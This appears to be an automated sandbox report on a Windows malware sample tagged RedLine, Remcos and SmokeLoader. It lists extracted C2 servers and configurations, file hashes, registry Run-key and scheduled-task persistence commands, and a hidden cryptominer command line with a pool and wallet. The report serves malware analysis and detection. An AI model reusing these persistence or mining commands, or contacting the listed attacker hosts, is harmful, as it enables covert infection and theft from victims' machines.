redline | 9804e56a73b0af43b7b519da92467c63365bf8cdd27090e2b0641616b9992632

Analysis

max time kernel
87s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
04/11/2022, 19:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6b2417eeac6a435ce8ef52ec4b98082b.exe
Size

292KB
MD5

6b2417eeac6a435ce8ef52ec4b98082b
SHA1

46a459c36a345038af6cf8ebf2d9bfa4db1a8df0
SHA256

9804e56a73b0af43b7b519da92467c63365bf8cdd27090e2b0641616b9992632
SHA512

46a395a047075979cc36b3415750c9a837a3975d8b2ddaa86c0c870687e93427a91fcb9192f0caec06bf6724ee060a940272bb0dae185bf920f1fa6ab9616cb4
SSDEEP

3072:31S1BIEjT02LyIk3u5rAy3zzStYfMoNwIYt2Y03P5emgbvQih/98KD:ABI92Le3q3itYfLJ9Y03P5emgT7/L

Score

10^/10

redline remcos smokeloader @redlinevip cloud (tg: @fatherofcarders)new v381 backdoor infostealer persistence rat trojan upx

Malware Config

Extracted

Family

remcos

Botnet

v381

srv01.airdns.org:32841

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
winupd381.exe
delete_file
true
hide_file
true
hide_keylog_file
true
install_flag
true
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
mouse_option
false
mutex
winupd_v381-K1NSYR
screenshot_crypt
true
screenshot_flag
false
screenshot_folder
winupdc_sc
screenshot_time
1
startup_value
winupd381
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
notepad;solitaire;

Extracted

Family

redline

Botnet

@REDLINEVIP Cloud (TG: @FATHEROFCARDERS)

151.80.89.233:13553

Attributes

auth_value
fbee175162920530e6bf470c8003fa1a

Extracted

Family

remcos

Botnet

New

173.212.217.108:1050

zab4ever.no-ip.org:1050

1zab4ever.no-ip.org:1050

1zab4ever.duckdns.org:1050

Attributes

audio_folder
MicRecords
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
BrowseUpdt.exe
delete_file
false
hide_file
true
hide_keylog_file
true
install_flag
true
install_path
%AppData%
keylog_crypt
false
keylog_file
nobita.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
khruioprs-T021C4
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
BrowseUpdt
take_screenshot_option
false
take_screenshot_time
5
take_screenshot_title
notepad;solitaire;

Signatures

Detects Smokeloader packer 3 IoCs

resource	yara_rule
behavioral2/memory/2404-133-0x0000000002E90000-0x0000000002E99000-memory.dmp	family_smokeloader
behavioral2/memory/3472-204-0x0000000002E90000-0x0000000002E99000-memory.dmp	family_smokeloader
behavioral2/memory/4912-220-0x00000000009E0000-0x00000000009E7000-memory.dmp	family_smokeloader

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral2/files/0x0005000000022dd3-230.dat	family_redline
behavioral2/files/0x0005000000022dd3-231.dat	family_redline
behavioral2/memory/3528-232-0x0000000000BB0000-0x0000000000BD8000-memory.dmp	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
1100	180C.exe
1432	1ACC.exe
2004	CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe
4604	LYKAA.exe
1984	47C9.exe
3472	6B01.exe
3584	EB2F.exe
1016	ED43.exe
3528	EF38.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3252-162-0x0000000000400000-0x0000000000BE9000-memory.dmp	upx
behavioral2/memory/3252-164-0x0000000000400000-0x0000000000BE9000-memory.dmp	upx
behavioral2/memory/3252-165-0x0000000000400000-0x0000000000BE9000-memory.dmp	upx
behavioral2/memory/3252-166-0x0000000000400000-0x0000000000BE9000-memory.dmp	upx
behavioral2/memory/3252-168-0x0000000000400000-0x0000000000BE9000-memory.dmp	upx
behavioral2/memory/3252-169-0x0000000000400000-0x0000000000BE9000-memory.dmp	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	1ACC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	LYKAA.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd381 = "\"C:\\ProgramData\\winupd381.exe\""	EB2F.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\	EB2F.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\winupd381 = "\"C:\\ProgramData\\winupd381.exe\""	EB2F.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run\	ED43.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BrowseUpdt = "\"C:\\Users\\Admin\\AppData\\Roaming\\BrowseUpdt.exe\""	ED43.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run\	EB2F.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1984 set thread context of 3252	1984	47C9.exe	102
PID 4604 set thread context of 944	4604	LYKAA.exe	105

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6B01.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6B01.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6B01.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6b2417eeac6a435ce8ef52ec4b98082b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6b2417eeac6a435ce8ef52ec4b98082b.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6b2417eeac6a435ce8ef52ec4b98082b.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2420	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4784	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2404	6b2417eeac6a435ce8ef52ec4b98082b.exe
2404	6b2417eeac6a435ce8ef52ec4b98082b.exe
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2940	Process not Found

Suspicious behavior: MapViewOfSection 20 IoCs

pid	Process
2404	6b2417eeac6a435ce8ef52ec4b98082b.exe
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
2940	Process not Found
3472	6B01.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeDebugPrivilege	2004	CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe
Token: SeDebugPrivilege	4604	LYKAA.exe
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found
Token: SeShutdownPrivilege	2940	Process not Found
Token: SeCreatePagefilePrivilege	2940	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2940 wrote to memory of 1100	2940	Process not Found	90
PID 2940 wrote to memory of 1100	2940	Process not Found	90
PID 2940 wrote to memory of 1100	2940	Process not Found	90
PID 2940 wrote to memory of 1432	2940	Process not Found	92
PID 2940 wrote to memory of 1432	2940	Process not Found	92
PID 1432 wrote to memory of 2004	1432	1ACC.exe	93
PID 1432 wrote to memory of 2004	1432	1ACC.exe	93
PID 2004 wrote to memory of 1600	2004	CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe	94
PID 2004 wrote to memory of 1600	2004	CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe	94
PID 1600 wrote to memory of 4784	1600	cmd.exe	96
PID 1600 wrote to memory of 4784	1600	cmd.exe	96
PID 1600 wrote to memory of 4604	1600	cmd.exe	97
PID 1600 wrote to memory of 4604	1600	cmd.exe	97
PID 4604 wrote to memory of 3424	4604	LYKAA.exe	98
PID 4604 wrote to memory of 3424	4604	LYKAA.exe	98
PID 3424 wrote to memory of 2420	3424	cmd.exe	100
PID 3424 wrote to memory of 2420	3424	cmd.exe	100
PID 2940 wrote to memory of 1984	2940	Process not Found	101
PID 2940 wrote to memory of 1984	2940	Process not Found	101
PID 1984 wrote to memory of 3252	1984	47C9.exe	102
PID 1984 wrote to memory of 3252	1984	47C9.exe	102
PID 1984 wrote to memory of 3252	1984	47C9.exe	102
PID 1984 wrote to memory of 3252	1984	47C9.exe	102
PID 1984 wrote to memory of 3252	1984	47C9.exe	102
PID 1984 wrote to memory of 3252	1984	47C9.exe	102
PID 1984 wrote to memory of 3252	1984	47C9.exe	102
PID 3252 wrote to memory of 2912	3252	RegSvcs.exe	103
PID 3252 wrote to memory of 2912	3252	RegSvcs.exe	103
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 4604 wrote to memory of 944	4604	LYKAA.exe	105
PID 944 wrote to memory of 2916	944	vbc.exe	106
PID 944 wrote to memory of 2916	944	vbc.exe	106
PID 2940 wrote to memory of 3472	2940	Process not Found	108
PID 2940 wrote to memory of 3472	2940	Process not Found	108
PID 2940 wrote to memory of 3472	2940	Process not Found	108
PID 2940 wrote to memory of 2416	2940	Process not Found	109
PID 2940 wrote to memory of 2416	2940	Process not Found	109
PID 2940 wrote to memory of 2416	2940	Process not Found	109
PID 2940 wrote to memory of 2416	2940	Process not Found	109
PID 2940 wrote to memory of 4312	2940	Process not Found	110
PID 2940 wrote to memory of 4312	2940	Process not Found	110
PID 2940 wrote to memory of 4312	2940	Process not Found	110
PID 2940 wrote to memory of 2092	2940	Process not Found	111
PID 2940 wrote to memory of 2092	2940	Process not Found	111
PID 2940 wrote to memory of 2092	2940	Process not Found	111
PID 2940 wrote to memory of 2092	2940	Process not Found	111
PID 2940 wrote to memory of 5084	2940	Process not Found	112
PID 2940 wrote to memory of 5084	2940	Process not Found	112
PID 2940 wrote to memory of 5084	2940	Process not Found	112
PID 2940 wrote to memory of 2848	2940	Process not Found	113
PID 2940 wrote to memory of 2848	2940	Process not Found	113
PID 2940 wrote to memory of 2848	2940	Process not Found	113

C:\Users\Admin\AppData\Local\Temp\6b2417eeac6a435ce8ef52ec4b98082b.exe
"C:\Users\Admin\AppData\Local\Temp\6b2417eeac6a435ce8ef52ec4b98082b.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2404

C:\Users\Admin\AppData\Local\Temp\180C.exe
C:\Users\Admin\AppData\Local\Temp\180C.exe
1⤵
- Executes dropped EXE
PID:1100

C:\Users\Admin\AppData\Local\Temp\1ACC.exe
C:\Users\Admin\AppData\Local\Temp\1ACC.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1432
- C:\Users\Admin\AppData\Roaming\CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe
  "C:\Users\Admin\AppData\Roaming\CsEKSsCbCSUHsBFKUscCEESFBsSFkFUHCCUBfbUSAHShSSfKSchFBse.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp23E3.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:4784
  - - C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
      "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4604
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3424
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:2420
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 6
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:944
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        6⤵
        
        PID:2916

C:\Users\Admin\AppData\Local\Temp\47C9.exe
C:\Users\Admin\AppData\Local\Temp\47C9.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3252
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "del C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:2912

C:\Users\Admin\AppData\Local\Temp\6B01.exe
C:\Users\Admin\AppData\Local\Temp\6B01.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3472

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2416

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4312

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2092

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5084

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2848

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:624

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3768

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4912

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4224

C:\Users\Admin\AppData\Local\Temp\EB2F.exe
C:\Users\Admin\AppData\Local\Temp\EB2F.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3584
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
  2⤵
  PID:2744
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\BrowseUpdt.exe"
    3⤵
    PID:4600
  - - C:\Users\Admin\AppData\Roaming\BrowseUpdt.exe
      C:\Users\Admin\AppData\Roaming\BrowseUpdt.exe
      4⤵
      PID:4076

C:\Users\Admin\AppData\Local\Temp\ED43.exe
C:\Users\Admin\AppData\Local\Temp\ED43.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1016
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
  2⤵
  PID:764
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\BrowseUpdt.exe"
    3⤵
    PID:2920
  - - C:\Users\Admin\AppData\Roaming\BrowseUpdt.exe
      C:\Users\Admin\AppData\Roaming\BrowseUpdt.exe
      4⤵
      PID:1420
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        5⤵
        
        PID:532

C:\Users\Admin\AppData\Local\Temp\EF38.exe
C:\Users\Admin\AppData\Local\Temp\EF38.exe
1⤵
- Executes dropped EXE
PID:3528

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1712

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3220

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4960

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3408

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3728

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
837KB

MD5
b71f097937ef3e6a757cda055babb005

SHA1
3fb167b8608824592d1707614cce46cfc643dd44

SHA256
917f533b13b2bac659f4a16d03ea4e1b30ee535c57c132b4d4f784fbd2c2a482

SHA512
d0fca6ef77597c68d8bbf671f4929764146be1dbeae2c6f66783be2922df09e9a7b983c603a295c1056b12f6cddf6e22eadea99bfc104266e4dae75b829b43aa

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe

Filesize
837KB

MD5
b71f097937ef3e6a757cda055babb005

SHA1
3fb167b8608824592d1707614cce46cfc643dd44

SHA256
917f533b13b2bac659f4a16d03ea4e1b30ee535c57c132b4d4f784fbd2c2a482

SHA512
d0fca6ef77597c68d8bbf671f4929764146be1dbeae2c6f66783be2922df09e9a7b983c603a295c1056b12f6cddf6e22eadea99bfc104266e4dae75b829b43aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\180C.exe

Filesize
704KB

MD5
3f5e7d9893b7893def45feb9e5b0a565

SHA1
e84715f6955d0848242de0f08783014d815f4f85

SHA256
af16198302a36beded55beb0b9b5f78711cd86e9934ecce64265073c396e400e

SHA512
fbc1d627a93b03a277256a74739bfe44bb47f07b3f8d56e0026f678a018d6a4837f3b7187433e01daed39209b3ce3fad53a4bc9d5923a35b5dd299640784ada3

Download Submit
C:\Users\Admin\AppData\Local\Temp\180C.exe

Filesize
704KB

MD5
3f5e7d9893b7893def45feb9e5b0a565

SHA1
e84715f6955d0848242de0f08783014d815f4f85

SHA256
af16198302a36beded55beb0b9b5f78711cd86e9934ecce64265073c396e400e

SHA512
fbc1d627a93b03a277256a74739bfe44bb47f07b3f8d56e0026f678a018d6a4837f3b7187433e01daed39209b3ce3fad53a4bc9d5923a35b5dd299640784ada3

Download Submit
C:\Users\Admin\AppData\Local\Temp\1ACC.exe

Filesize
1.1MB

MD5
532f80cb0ccfd2fcad21bca6044b2ff7

SHA1
47d26fb23e4192469fff7693922ef239cea1d5cf

SHA256
44673c9ea35c6aa5fcb5481674afe921ae12a2f8f485d38c0ffc0accb0f406de

SHA512
d4cc16c884f8ce0792e578ac548d2a3f1fc794bfb83276e8329877bb07067997651405625a4a39993848beea8a46308f2ca6f01ca6b3ca41e9b4c87885e7ebb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1ACC.exe

Filesize
1.1MB

MD5
532f80cb0ccfd2fcad21bca6044b2ff7

SHA1
47d26fb23e4192469fff7693922ef239cea1d5cf

SHA256
44673c9ea35c6aa5fcb5481674afe921ae12a2f8f485d38c0ffc0accb0f406de

SHA512
d4cc16c884f8ce0792e578ac548d2a3f1fc794bfb83276e8329877bb07067997651405625a4a39993848beea8a46308f2ca6f01ca6b3ca41e9b4c87885e7ebb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\47C9.exe

Filesize
3.6MB

MD5
9dbeffadf180fe215fc33f0cec75a13b

SHA1
73ddcbcd479ea6d7c5adec487a482989d65517ea

SHA256
da0914b9477057a8f1424f0bf695064d34b609bf54f25c2dfccff3b142301bdc

SHA512
877427bf184f7d22c8cb562cc8800cc50191b19f444bb1c4e06b43d3f4e2ac38670daf0bf4b481d660314fb6193162177f5ca970544776f437757e2672fd0cde

Download Submit
C:\Users\Admin\AppData\Local\Temp\47C9.exe

Filesize
3.6MB

MD5
9dbeffadf180fe215fc33f0cec75a13b

SHA1
73ddcbcd479ea6d7c5adec487a482989d65517ea

SHA256
da0914b9477057a8f1424f0bf695064d34b609bf54f25c2dfccff3b142301bdc

SHA512
877427bf184f7d22c8cb562cc8800cc50191b19f444bb1c4e06b43d3f4e2ac38670daf0bf4b481d660314fb6193162177f5ca970544776f437757e2672fd0cde

Download Submit
C:\Users\Admin\AppData\Local\Temp\6B01.exe

Filesize
292KB

MD5
61bcb011b4e4a5fca5af9d570a319055

SHA1
9f1ff2953e1c0fac624b5deae1deb7885ea2c873

SHA256
1d5f939ef6b4cb7357a901fea27ff51c41a7ada4935d02d5e6e214563e2a54ba

SHA512
f27057bb8d09876229634e87d03b9ac92a1f6b63e2bb6edc1a4f4593ec514ec1f4ab4e3013652b813126872e660bee62ee758a3d24223db16f7890ef5fe3a7d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\6B01.exe

Filesize
292KB

MD5
61bcb011b4e4a5fca5af9d570a319055

SHA1
9f1ff2953e1c0fac624b5deae1deb7885ea2c873

SHA256
1d5f939ef6b4cb7357a901fea27ff51c41a7ada4935d02d5e6e214563e2a54ba

SHA512
f27057bb8d09876229634e87d03b9ac92a1f6b63e2bb6edc1a4f4593ec514ec1f4ab4e3013652b813126872e660bee62ee758a3d24223db16f7890ef5fe3a7d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\EB2F.exe

Filesize
470KB

MD5
725b1943cc4fdc03ac1ad41134c29f05

SHA1
5a491e17e4883ec2330f68a626610df99fdd4df3

SHA256
0f59371d1a6027687935cc34a8d51a7270ca17537987c7776aa8261b664ee628

SHA512
939be0c1e971da0998ad41cd3a8c42569bd016d036b263b238586d6ddc30fce59fea613a7a38da286bd518ca2a4d13c39d83fed2ae8f7f5ef6320b08e680e1cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\EB2F.exe

Filesize
470KB

MD5
725b1943cc4fdc03ac1ad41134c29f05

SHA1
5a491e17e4883ec2330f68a626610df99fdd4df3

SHA256
0f59371d1a6027687935cc34a8d51a7270ca17537987c7776aa8261b664ee628

SHA512
939be0c1e971da0998ad41cd3a8c42569bd016d036b263b238586d6ddc30fce59fea613a7a38da286bd518ca2a4d13c39d83fed2ae8f7f5ef6320b08e680e1cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ED43.exe

Filesize
453KB

MD5
02d693c186871b0aba2101233ee64173

SHA1
f5786f6346286e9e61f2c4cde7cf0dd877d103da

SHA256
ec8ecee61aeab54e0622706710e9cbe56cdda7d2b47c5d13ef343092c868120c

SHA512
aa2948a490ed50dbfc8568ee9c521ab52e136894cb5f012d0879640cda5af5de1c41579dbe463bfe15580c51b892155e39bf0bfa883f5fd79d37285b2abeb768

Download Submit
C:\Users\Admin\AppData\Local\Temp\ED43.exe

Filesize
453KB

MD5
02d693c186871b0aba2101233ee64173

SHA1
f5786f6346286e9e61f2c4cde7cf0dd877d103da

SHA256
ec8ecee61aeab54e0622706710e9cbe56cdda7d2b47c5d13ef343092c868120c

SHA512
aa2948a490ed50dbfc8568ee9c521ab52e136894cb5f012d0879640cda5af5de1c41579dbe463bfe15580c51b892155e39bf0bfa883f5fd79d37285b2abeb768

Download Submit
C:\Users\Admin\AppData\Local\Temp\EF38.exe

Filesize
137KB

MD5
06cee591f384a048b3403819d9328e82

SHA1
4b8dd48bb52cf306a21a0ef3a3449c0963dbae4e

SHA256
f4d228b52dbea8f6c059c2debe6fea366833f27ae9dcd5b793248e830a0cb8c4

SHA512
38928ee89657576814597fb5a4bfe8380b04557921b2b5e5ad09afaa208d3080d897c47154ebc8fdf4a844b55b34f8c7d572ccc2a70e9abdf3861d0621764ae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\EF38.exe

Filesize
137KB

MD5
06cee591f384a048b3403819d9328e82

SHA1
4b8dd48bb52cf306a21a0ef3a3449c0963dbae4e

SHA256
f4d228b52dbea8f6c059c2debe6fea366833f27ae9dcd5b793248e830a0cb8c4

SHA512
38928ee89657576814597fb5a4bfe8380b04557921b2b5e5ad09afaa208d3080d897c47154ebc8fdf4a844b55b34f8c7d572ccc2a70e9abdf3861d0621764ae5

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.vbs

Filesize
412B

MD5
983609782eefdfb08a07ef630996dc0c

SHA1
47d060bf4d7ce66d807aa246e4a78ce3c1ac29b0

SHA256
